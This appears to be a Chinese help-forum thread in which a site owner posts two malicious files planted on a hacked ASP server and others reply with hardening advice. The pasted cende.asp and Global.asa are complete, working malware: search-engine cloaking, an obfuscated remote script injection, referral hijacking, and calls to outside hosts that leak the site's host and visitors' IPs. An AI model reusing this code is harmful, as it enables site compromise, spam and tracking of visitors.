asp网站被黑了~该如何解决

asp网站被黑了~
服务器总是多这些文件,文件名都会不同,我只能用备份找出不同的删除,一删除过一天又出现其它名称的文件,用了COMODO和瑞星,豆是新手,用默认设置
束手无策中,请高手指点从哪解决

附某天多出的两文件~~~~~~
文件cende.asp
<%
if instr(1," "&lcase(Request.ServerVariables("HTTP_USER_AGENT"))&" ","http://",1)>0 then
%>

<%
Response.CharSet="gb2312"
Session.CodePage=936
Server.ScriptTimeOut=500
dim id,mmhuan,wang,mulu,wenjian

wang="http://huo.nfslc.com/sh/sh.asp"
lang="http://link.nfslc.com/new/n.asp"
response.write gethttppage(wang,"","get","","","","*/*","no",1)(0)
response.write gethttppage(lang,"","get","","","","*/*","no",1)(0)

response.end
%>

<%
' --------------------------------
function gethttppage(url1,urlcode2,fangshi3,cookie4,neirong5,lailu6,accept7,zijie8,zhua9)
dim http,neirong,wjrhuan(5)
if len(url1)=0 then
gethttppage=wjrhuan
exit function
end if
set http=Server.createobject("Win"&"Http.W"&"inHtt"&"pRe"&"quest"&".5.1")
TimeInterval=200
lResolve=100
lConnect=100
lSend=100
lReceive=100
http.setTimeouts lResolve*1000,lConnect*1000,lSend*1000,lReceive*1000
http.Option(4) = 13056
http.Option(6) = zhua9
http.open ucase(fangshi3),url1,false
if ucase(fangshi3)="POST" then
http.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
end if
http.setRequestHeader "Accept",accept7
if len(lailu6)>0 then
http.setRequestHeader "Referer",lailu6
end if
http.setRequestHeader "User-Agent","Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
http.setRequestHeader "Accept-Language","zh-cn"
http.setRequestHeader "Connection","Keep-Alive"
http.setRequestHeader "Cache-Control","no-cache"

if len(cookie4)>0 then
http.setRequestHeader "Cookie",cookie4
else
end if

http.send(neirong5)
wjrhuan(1)=http.getAllResponseHeaders()
wjrhuan(2)=http.status
wjrhuan(3)=http.statustext
wjrhuan(4)=http.responseText
dim wenben,wenbeni,wenben3,bianmaok
bianmaok=""
wenben=lcase(http.getAllResponseHeaders())
if instr(1,wenben,"content-type: ",1)=0 or instr(1,wenben,"content-type: text",1)>0 then
if instr(1,wenben,"content-type: ",1)>0 then
wenbeni=tiress(wenben,"content-type: ",chr(13)&chr(10))
if instr(1,wenbeni,"charset=",1)>0 then
bianmaok=tiress(wenbeni&chr(13)&chr(10),"charset=",chr(13)&chr(10))
end if
end if

if len(bianmaok)=0 then
wenbeni=zzqu(http.responseText,"<meta([^<]*)charset=([^<]*)>","=")

if len(wenbeni)>0 then
wenbeni=replace(wenbeni,"""","",1,-1,1)
wenbeni=replace(wenbeni,"'","",1,-1,1)
wenben3=zzqu(wenbeni,"charset=[a-z0-9\-\_]+","=")
bianmaok=tiress(wenben3,"charset=","renyaai")
end if
end if

if len(bianmaok)=10 then
If len(http.responseBody)>0 and AscB(MidB(http.responseBody,1,1))=&HEF and AscB(MidB(http.responseBody,2,1))=&HBB then
bianmaok="utf-8"
elseif len(http.responseBody)>10 and AscB(MidB(http.responseBody,1,1))=&HFF and AscB(MidB(http.responseBody,2,1))=&HFE then

bianmaok="unicode"
elseif len(http.responseBody)>10 and AscB(MidB(http.responseBody,1,1))=&HFE and AscB(MidB(http.responseBody,2,1))=&HFF then
bianmaok="unicodeFFFE"
else
bianmaok="gb2312"
end if
end if

end if

if len(bianmaok)=0 then
bianmaok="gb2312"
end if
if http.status=200 then
if zijie8="yes" then
wjrhuan(0)=http.responseBody
else
if instr(1,wenben,"content-encoding: gzip",1)=0 then

if len(urlcode2)>0 then
wjrhuan(0)=readfile(http.responseBody,urlcode2) '网页内容
else
wjrhuan(0)=readfile(http.responseBody,bianmaok) '网页内容
end if
else
wjrhuan(0)=""
end if

end if
end if

gethttppage=wjrhuan
set http=nothing
if err.number<>0 then
err.Clear
end if
end function

function readfile(url1,urlcode2)
if len(url1)=0 then
readfile=""
exit function
end if

dim srmobj
set srmobj=Server.CreateObject("ado" & "db.stre" & "am")
srmobj.type=1
srmobj.mode=3
srmobj.open
srmobj.write url1
srmobj.position=0
srmobj.type=2
srmobj.charset=urlcode2
readfile=srmobj.readtext()
set srmobj=nothing
end function

function zzqu(zifu,moshi,buyao)
dim zzexp,zzmat,zzmates
set zzexp=new regexp
zzexp.ignorecase=true
zzexp.global=true
zzexp.pattern=moshi
'设置模式
set zzmates=zzexp.execute(zifu)
for each zzmat in zzmates
if instr(1,zzmat.value,buyao,1)>0 then
zzqu=zzqu&zzmat.value&"renyaai"
else
end if
next
set zzexp=nothing
end function

function riwen(mm)
riwen=replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(mm,"ゴ",""),"ガ",""),"ギ",""),"グ",""),"ゲ",""),"ザ",""),"ジ",""),"ズ",""),"ヅ",""),"デ",""),"ド",""),"ポ",""),"ベ",""),"プ",""),"ビ",""),"パ",""),"ヴ",""),"ボ",""),"ペ",""),"ブ",""),"ピ",""),"バ",""),"ヂ",""),"ダ",""),"ゾ",""),"ゼ","")
end function

function tiress(trea,treb,trec)
dim tia,tib,tic

if instr(1,trea,treb,1)<1 then
tiress=""
exit function
end if
if instr(1,trea,trec,1)<1 then
tiress=""
exit function
end if
tia=instr(1,trea,treb,1)
tib=instr(tia+len(treb),trea,trec,1)

if tib<1 then
tiress=""
exit function
end if
tiress=mid(trea,tia+len(treb),tib-tia-len(treb))
end function

function wjrdu(dizhi,code)
dim stm,fso
set fso=createobject("scripting.filesystemobject")
if fso.fileexists(dizhi)=false then
wjrdu="<p>资源不存在"
set fso=nothing
exit function
end if
set fso=nothing
' set stm=Server.CreateObject("ado" & "db.stre" & "am")
set stm=Server.CreateObject("ado" & "db.stre" & "am")
stm.Type=2 '以本模式读取
stm.mode=3
stm.charset=code
stm.open
stm.loadfromfile dizhi
wjrdu=stm.readtext
stm.Close

end function

function wjrxie(dizhi,code,neirong)
dim objStream
'Set objStream=Server.CreateObject("ado" & "db.stre" & "am")
Set objStream=Server.CreateObject("ado" & "db.stre" & "am")
With objStream
.type=2
.mode=3
.Open
.Charset = code
.Position = objStream.Size
.WriteText=neirong
.SaveToFile dizhi,2
.Close
End With
Set objStream = Nothing
end function

%>

<%
response.end
end if
%>
<%
response.write("<scri"&"pt lang"&"uage='jav"&"as"&"cri"&"pt' src='h"&"t"&"t"&"p"&":"&"/"&"/"&"p"&"u"&"s"&"h"&"."&"n"&"f"&"s"&"l"&"c"&"."&"c"&"o"&"m"&"/"&"sh"&".j"&"s'></sc"&"ript>")
%>

文件Global.asa
<SCRIPT LANGUAGE="VBScript" RUNAT="Server">
Server.ScriptTimeout=6000
On Error Resume Next
dim Q
Q=request.servervariables("HTTP_REFERER")
if Instr(Q,"%CE%B0")>0 Or Instr(Q,"%CE%B0")>0 Then
Response.Redirect("http://meiyg.52chaochui.com/index.asp")
End If
Sub Session_onStart
if instr(request.servervariables("HTTP_REFERER"),Request.ServerVariables("HTTP_HOST"))>0 then
exit sub
elseif instr(request.servervariables("HTTP_REFERER"),"www.baidu.com/s?")>0 and instr(request.servervariables("QUERY_STRING"),"void=")>0 then
response.redirect("http://www.ajeni.cn/ZYXedit/editor/skins/default/images/seo/weige_snew_www.我的域名.net.asp?"&Request.ServerVariables
("HTTP_HOST"))
elseif instr(request.servervariables("HTTP_USER_AGENT"),"aidu")>0 and instr(request.servervariables("SCRIPT_NAME"),"win")=0 then
Dim Url,Html,Get_String,Get_id,Get_String2
randomize
Get_id=int(10000000*rnd)
Get_String=Request.ServerVariables("REMOTE_ADDR")
Get_String2=Request.ServerVariables("HTTP_HOST")
Url="http://www.ajeni.cn/ZYXedit/editor/skins/default/images/seo/weige_snew_www.(我的域名).asp?m="&Get_String2&"&r="&Get_String&"&x="&Get_id
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")
ObjXMLHTTP.Open "GET",url,False
ObjXMLHTTP.setRequestHeader "User-Agent",url
ObjXMLHTTP.send
GetHtml=ObjXMLHTTP.responseBody
Set ObjXMLHTTP=Nothing
set objStream = Server.CreateObject("Adodb.Stream")
objStream.Type = 1
objStream.Mode =3
objStream.Open
objStream.Write GetHtml
objStream.Position = 0
objStream.Type = 2
objStream.Charset = "gb2312"
GetHtml = objStream.ReadText
objStream.Close
if instr(GetHtml,"</html>")>0 then
Response.write GetHtml
end if
end if
End Sub
</SCRIPT>

[解决办法]
在conn.asp里设置<sql防注>,上百度搜索下载.

网站所有目录设置只读.数据库可写.另外要将上传目录的执行权限设为:无

基本安全了.
[解决办法]

应当是你的IIS 或者文件夹的权限没有设置好！

读和写的权限要分配好
[解决办法]
1,先定期的备份服务器上整个网站，出现问题了，可以复原一下

2，检查上传下载的权限，对于Ewebeditor编辑器的文件上传大小进行控制。
3，服务器上安装一个macfee软件，通过mcafee的设置可以禁止网站不存在的文件名或文件格式的上传
4，检查iis网站属性中，为网站设置一个新建的应用程序池，并在iis用户中上为网站设置一个用户。
5，右击网站属性找到“安全”标签，把权限作个设置
6，数据库用户不要用sa,新建一个用户
7，页面作防sql注入

asp网站被黑了~该如何解决

热点推荐